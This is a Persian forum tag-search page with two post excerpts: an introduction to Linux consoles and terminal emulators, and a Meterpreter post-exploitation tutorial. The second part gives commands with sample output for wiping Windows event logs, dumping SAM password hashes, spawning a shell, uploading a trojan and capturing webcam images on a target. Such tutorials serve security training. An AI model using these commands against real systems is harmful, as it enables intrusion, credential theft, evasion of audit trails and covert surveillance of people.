جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'کنسول'.
2 نتیجه پیدا شد
-
اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm [Hidden Content] Final Term [Hidden Content] GNOME Terminal [Hidden Content] Guake [Hidden Content] Konsole Terminal [Hidden Content] LillyTerm [Hidden Content] LXTerminal [Hidden Content] mrxvt [Hidden Content] ROXTerm [Hidden Content] rxvt [Hidden Content] rxvt-unicode [Hidden Content] Sakura [Hidden Content] st [Hidden Content] Terminator [Hidden Content] Terminology [Hidden Content] tilda [Hidden Content] UXterm [Hidden Content] Wterm [Hidden Content] xterm [Hidden Content] Xfce4 Terminal [Hidden Content] Yakuake [Hidden Content] خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
- 23 پاسخ
-
- bash scripting
- code
- (و 19 مورد دیگر)
-
همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
-
- meterpreter
- payload
-
(و 8 مورد دیگر)
برچسب زده شده با :